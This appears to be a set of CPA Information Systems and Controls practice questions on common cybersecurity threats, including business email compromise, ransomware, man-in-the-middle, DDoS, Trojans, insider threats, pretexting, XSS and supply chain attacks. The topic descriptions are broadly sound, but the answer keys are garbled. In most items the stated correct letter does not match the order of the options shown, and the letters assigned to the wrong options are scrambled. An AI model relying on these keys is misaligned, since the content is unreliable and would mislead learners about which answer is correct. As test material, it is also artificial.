Identify Common Cybersecurity Threats And Vulnerabilities
Help Questions
CPA Information Systems and Controls (ISC) › Identify Common Cybersecurity Threats And Vulnerabilities
A company's employees receive emails appearing to be from the CEO asking them to urgently wire transfer funds to an external account. This attack is best described as:
A man-in-the-middle attack intercepting CEO communications.
A spear phishing / business email compromise (BEC) attack using impersonation to fraudulently induce financial transfers.
A ransomware attack encrypting company data for payment.
A distributed denial-of-service (DDoS) attack overwhelming the email server.
Explanation
BEC/spear phishing attacks impersonate executives to trick employees into authorizing fraudulent financial transactions - a major source of financial fraud. Answer B is correct. Ransomware (A) encrypts data. DDoS (C) disrupts availability. MITM (D) intercepts active communications rather than impersonating via email.
Ransomware is best described as:
A network attack that floods a target with traffic to make it unavailable.
Software that secretly monitors and transmits user activity to a remote attacker.
Malware that encrypts a victim's files or systems, rendering them inaccessible, and demands payment (usually cryptocurrency) in exchange for the decryption key.
A type of social engineering that tricks users into revealing passwords.
Explanation
Ransomware encrypts data and extorts payment for decryption - one of the most financially damaging cyberthreats to organizations. Answer A is correct. Silent monitoring and data exfiltration (B) describes spyware/RATs. Traffic flooding (C) describes DDoS. Password extraction through deception (D) describes phishing.
An attacker intercepts communications between a user and their bank's website, reading and potentially modifying the traffic without either party's knowledge. This is best described as:
A denial-of-service attack.
A phishing attack.
A man-in-the-middle (MITM) attack.
A SQL injection attack.
Explanation
A MITM attack positions the attacker between two communicating parties, enabling interception and potential modification of the traffic without detection. Answer B is correct. Phishing (A) deceives users into revealing credentials. DoS (C) disrupts availability. SQL injection (D) targets databases through application input.
Social engineering attacks are most dangerous because they:
Exploit unpatched software vulnerabilities in operating systems.
Bypass technical controls by exploiting human psychology - manipulating people rather than systems.
Are conducted by highly skilled nation-state hackers.
Always result in complete system compromise and data exfiltration.
Explanation
Social engineering targets the human element - the weakest link in security - using deception, urgency, or authority to convince people to take actions that compromise security. Technical controls cannot fully prevent socially engineered attacks. Answer C is correct. Software vulnerabilities (A) and nation-state actors (B) describe technical attacks. Outcomes vary (D).
A distributed denial-of-service (DDoS) attack primarily threatens which element of the CIA triad?
Confidentiality - by exposing sensitive data to unauthorized parties.
Authentication - by bypassing login controls to gain unauthorized access.
Availability - by overwhelming systems with traffic to make them inaccessible to legitimate users.
Integrity - by modifying data in transit between systems.
Explanation
DDoS attacks overwhelm systems with traffic, making them unavailable - directly attacking the availability principle. Answer A is correct. DDoS does not typically expose data (B), modify data (C), or bypass authentication (D).
An employee unknowingly installs software that appears to be a legitimate productivity tool but secretly creates a backdoor for attackers to access the corporate network. This malware type is called:
Ransomware - malware that encrypts files for extortion.
A worm - self-replicating malware that spreads across networks.
A Trojan horse - malware disguised as legitimate software that creates unauthorized access.
Adware - software that displays unwanted advertisements.
Explanation
A Trojan horse disguises itself as legitimate software to trick users into installing it, then executes malicious functionality like creating backdoors. Answer D is correct. Worms (A) spread without user action. Ransomware (B) encrypts data. Adware (C) displays ads.
Which of the following best describes an 'insider threat' in cybersecurity?
Attacks launched from inside the organization's firewall by external hackers who have breached the perimeter.
Threats that originate from internal vulnerability scanning activities.
Security risks posed by current or former employees, contractors, or partners who misuse their authorized access - whether maliciously or inadvertently.
Threats from employees who are unaware of the organization's security policies.
Explanation
Insider threats come from individuals with authorized access - including malicious insiders (data theft, sabotage), negligent insiders (accidental data disclosure), and compromised insiders (whose credentials are stolen). Answer B is correct. Perimeter-breaching attackers (A) are external threats. Vulnerability scanning (C) is a security activity. Policy unawareness (D) is a training gap, not an insider threat category.
Pretexting is a form of social engineering in which an attacker:
Uses malware to intercept keystrokes and capture passwords.
Sends mass emails impersonating a trusted organization to harvest login credentials.
Creates a fake website that closely mimics a legitimate one to steal credentials.
Creates a fabricated scenario (pretext) to manipulate a victim into revealing information or taking an action they otherwise wouldn't.
Explanation
Pretexting involves fabricating a believable story - posing as IT support, an auditor, or a vendor - to manipulate the victim. Answer C is correct. Fake websites (A) describe pharming/website spoofing. Mass credential harvesting emails (B) describe phishing. Keystroke capture (D) describes a keylogger.
Which of the following vulnerabilities does cross-site scripting (XSS) exploit?
Unpatched operating system vulnerabilities in web servers.
Weak password policies that allow brute-force attacks on web application accounts.
Insufficient input validation that allows attackers to inject malicious scripts into web pages viewed by other users.
Misconfigured database permissions allowing unauthorized SQL queries.
Explanation
XSS exploits insufficient sanitization of user-supplied input to inject client-side scripts into web pages - scripts that execute in other users' browsers, potentially stealing session tokens or performing actions on their behalf. Answer D is correct. OS vulnerabilities (A), brute-force (B), and SQL permissions (C) are different vulnerability types.
Which of the following best describes a 'supply chain attack' in cybersecurity?
An attack that compromises a trusted vendor or software update to deliver malware to the vendor's customers - targeting organizations indirectly through their trusted supply chain.
An attack that disrupts an organization's physical supply chain operations.
An attack targeting an organization's procurement system to manipulate purchase orders.
Social engineering of supply chain employees to gain physical access to warehouses.
Explanation
Supply chain attacks compromise trusted software, hardware, or service providers to reach a broader set of targets - exemplified by the SolarWinds attack where malware was distributed through a software update. Answer A is correct. Physical supply chain disruption (B), procurement system attacks (C), and physical access attacks (D) are different threat scenarios.